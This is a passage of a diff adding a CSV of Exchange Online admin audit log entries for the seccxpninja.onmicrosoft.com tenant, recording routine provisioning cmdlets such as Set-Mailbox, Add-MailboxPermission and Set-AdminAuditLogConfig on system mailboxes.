+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-06T01:50:56Z,,,Set-AdminAuditLogConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""AdminAuditLogEnabled"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-06T01:50:51Z,,,Add-MailboxPermission,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}""
+  },
+  {
+    ""Name"": ""User"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/Discovery Management""
+  },
+  {
+    ""Name"": ""AccessRights"",
+    ""Value"": ""FullAccess""
+  }
+]"
+2020-05-06T01:50:39Z,,,Set-OwaMailboxPolicy,"[
+  {
+    ""Name"": ""InstantMessagingType"",
+    ""Value"": ""Ocs""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\OwaMailboxPolicy-Default""
+  }
+]"
+2020-05-06T01:50:22Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:21Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:17Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:12Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:11Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:06Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:49:59Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}""
+  },
+  {
+    ""Name"": ""ShardRelevancyFeatureStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange""
+  }
+]"
+2020-05-06T01:49:53Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}""
+  },
+  {
+    ""Name"": ""UMDataStorage"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-06T01:50:53Z,,,Set-ExchangeAssistanceConfig,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""PrivacyStatementURL"",
+    ""Value"": ""http://go.microsoft.com/fwlink/?LinkID=259417""
+  },
+  {
+    ""Name"": ""PrivacyLinkDisplayEnabled"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-06T01:50:53Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""HygieneSuite"",
+    ""Value"": ""Premium""
+  }
+]"
+2020-05-06T01:50:27Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:27Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:22Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:17Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:16Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:11Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:06Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:50:05Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-06T01:49:52Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""UMGrammar"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""MaxSendSize"",
+    ""Value"": ""1 GB (1,073,741,824 bytes)""
+  },
+  {
+    ""Name"": ""MailRouting"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""MessageTracking"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OMEncryption"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OABGen"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ClientExtensions"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}""
+  },
+  {
+    ""Name"": ""GMGen"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SuiteServiceStorage"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-06T01:49:37Z,,,Install-AdminAuditLogConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-06T01:49:17Z,,,Enable-AddressListPaging,"[
+  {
+    ""Name"": ""DoNotUpdateRecipients"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
